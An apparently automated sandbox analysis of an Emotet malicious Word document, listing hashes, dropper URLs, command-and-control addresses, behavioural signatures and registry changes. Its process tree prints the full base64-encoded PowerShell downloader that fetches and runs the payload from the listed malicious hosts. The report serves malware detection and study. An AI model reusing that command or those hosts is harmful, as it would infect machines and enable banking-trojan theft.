emotet | 501948f523c9bce4662fe102da5d632e953fccc2f521565eabc8f424297a4f1f

General

Target

SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111.doc
Size

175KB
MD5

84b4a3bdfd680dc3fde940f31a74dc97
SHA1

e0ca5c78044b5feee5e67dc4e74a7420d5705f05
SHA256

501948f523c9bce4662fe102da5d632e953fccc2f521565eabc8f424297a4f1f
SHA512

fbeac6eb5aefb96957026ffd95368ce9c6d7822dec96eb391983807d69a045d90c24bec19a3347f50626a669d4729033bafe0036b92e64152b71edeb251a67e8

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://jkncrew.com/cgi-bin/KhSO16ZAAf/

exe.dropper

http://jmlandscapingservice.com/content/fhGAfKs/

exe.dropper

http://jimlowry.com/dlqCTc01p/

exe.dropper

http://www.lesliemontenegro.com/wp-includes/I1hHqDE6/

exe.dropper

http://johnkeanestudios.com/r00t/vAWElRm/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/1800-10-0x00000000002B0000-0x00000000002BC000-memory.dmp	emotet
behavioral1/memory/1800-10-0x00000000002B0000-0x00000000002BC000-memory.dmp	emotet
behavioral1/memory/1604-13-0x0000000000680000-0x000000000068C000-memory.dmp	emotet
behavioral1/memory/1604-13-0x0000000000680000-0x000000000068C000-memory.dmp	emotet

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE545.exepots.exe

pid process

832 WINWORD.EXE
832 WINWORD.EXE
1800 545.exe
1604 pots.exe
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1652 836 powersheLL.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powersheLL.exepots.exe

pid process

1652 powersheLL.exe
1652 powersheLL.exe
1604 pots.exe
1604 pots.exe
1604 pots.exe
Blacklisted process makes network request 2 IoCs

Processes:

powersheLL.exe

flow pid process

4 1652 powersheLL.exe
6 1652 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

545.exepots.exe

pid process

1800 545.exe
1604 pots.exe

pid	process
832	WINWORD.EXE
832	WINWORD.EXE
1800	545.exe
1604	pots.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	836	powersheLL.exe

pid	process
1652	powersheLL.exe
1652	powersheLL.exe
1604	pots.exe
1604	pots.exe
1604	pots.exe

flow	pid	process
4	1652	powersheLL.exe
6	1652	powersheLL.exe

pid	process
1800	545.exe
1604	pots.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

545.exe

description	pid	process	target process
PID 1800 wrote to memory of 1604	1800	545.exe	pots.exe
PID 1800 wrote to memory of 1604	1800	545.exe	pots.exe
PID 1800 wrote to memory of 1604	1800	545.exe	pots.exe
PID 1800 wrote to memory of 1604	1800	545.exe	pots.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

832 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1652 powersheLL.exe

pid	process
832	WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	1652	powersheLL.exe

Drops file in System32 directory 2 IoCs

Processes:

powersheLL.exe545.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File opened for modification	C:\Windows\SysWOW64\fdBthProxy\pots.exe	545.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Office loads VBA resources, possible macro or embedded object present

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{319D1F47-C118-4272-9F16-C16971A61C8C}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{319D1F47-C118-4272-9F16-C16971A61C8C}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{319D1F47-C118-4272-9F16-C16971A61C8C}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{319D1F47-C118-4272-9F16-C16971A61C8C}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{319D1F47-C118-4272-9F16-C16971A61C8C}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111.doc"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Modifies registry class
PID:832

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAUwBYAEwAVQBQAGcAdwBpACAAPQAgACcANQA0ADUAJwA7ACQAVwBBAFEATABOAG8AdwBoAD0AJwBPAEgASQBFAFoAeQBoAHUAJwA7ACQAUQBMAFMASgBLAGkAcQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAFgATABVAFAAZwB3AGkAKwAnAC4AZQB4AGUAJwA7ACQARwBXAFoAWgBCAGoAagBqAD0AJwBDAEEATABRAEIAcwB1AG0AJwA7ACQAUgBOAFoATABNAHAAZQB6AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcARQBCAEMATABpAEUATgBUADsAJABGAEwAWQBDAE4AaQBwAGUAPQAnAGgAdAB0AHAAOgAvAC8AagBrAG4AYwByAGUAdwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAEsAaABTAE8AMQA2AFoAQQBBAGYALwAqAGgAdAB0AHAAOgAvAC8AagBtAGwAYQBuAGQAcwBjAGEAcABpAG4AZwBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwBjAG8AbgB0AGUAbgB0AC8AZgBoAEcAQQBmAEsAcwAvACoAaAB0AHQAcAA6AC8ALwBqAGkAbQBsAG8AdwByAHkALgBjAG8AbQAvAGQAbABxAEMAVABjADAAMQBwAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABlAHMAbABpAGUAbQBvAG4AdABlAG4AZQBnAHIAbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ASQAxAGgASABxAEQARQA2AC8AKgBoAHQAdABwADoALwAvAGoAbwBoAG4AawBlAGEAbgBlAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAHIAMAAwAHQALwB2AEEAVwBFAGwAUgBtAC8AJwAuACIAUwBQAEwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAEcAVwBWAFMAbABkAHUAPQAnAFkATQBHAFIAUABmAGIAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBXAFAAQQBJAGoAbwBtACAAaQBuACAAJABGAEwAWQBDAE4AaQBwAGUAKQB7AHQAcgB5AHsAJABSAE4AWgBMAE0AcABlAHoALgAiAEQAbwBXAGAATgBMAG8AQQBgAEQARgBpAEwARQAiACgAJABKAFcAUABBAEkAagBvAG0ALAAgACQAUQBMAFMASgBLAGkAcQBhACkAOwAkAEMAWABaAEcAQwBkAGEAdAA9ACcAVgBYAEYAUQBKAG4AcABxACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBMAFMASgBLAGkAcQBhACkALgAiAGwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADIAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAEEAdABlACIAKAAkAFEATABTAEoASwBpAHEAYQApADsAJABLAEUATgBXAEgAcwBsAHcAPQAnAEwATABGAE8AVQBiAHMAcAAnADsAYgByAGUAYQBrADsAJABLAEUAUwBWAFkAZQBoAHgAPQAnAEkARABUAEIAWQBzAHcAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAEIAUgBOAFIAZwBzAGgAPQAnAFAASQBMAE8AUgB4AGYAZwAnAA==
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
PID:1652

C:\Users\Admin\545.exe
C:\Users\Admin\545.exe
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:1800

C:\Windows\SysWOW64\fdBthProxy\pots.exe
"C:\Windows\SysWOW64\fdBthProxy\pots.exe"
2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1604

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\545.exe

Download Submit
C:\Users\Admin\545.exe

Download Submit
C:\Windows\SysWOW64\fdBthProxy\pots.exe

Download Submit
memory/832-2-0x0000000008F50000-0x0000000008F54000-memory.dmp

Filesize
16KB

Download
memory/832-5-0x000000000B010000-0x000000000B014000-memory.dmp

Filesize
16KB

Download
memory/832-6-0x000000000C090000-0x000000000C094000-memory.dmp

Filesize
16KB

Download
memory/1604-11-0x0000000000000000-mapping.dmp

Download
memory/1604-13-0x0000000000680000-0x000000000068C000-memory.dmp

Filesize
48KB

Download
memory/1800-10-0x00000000002B0000-0x00000000002BC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads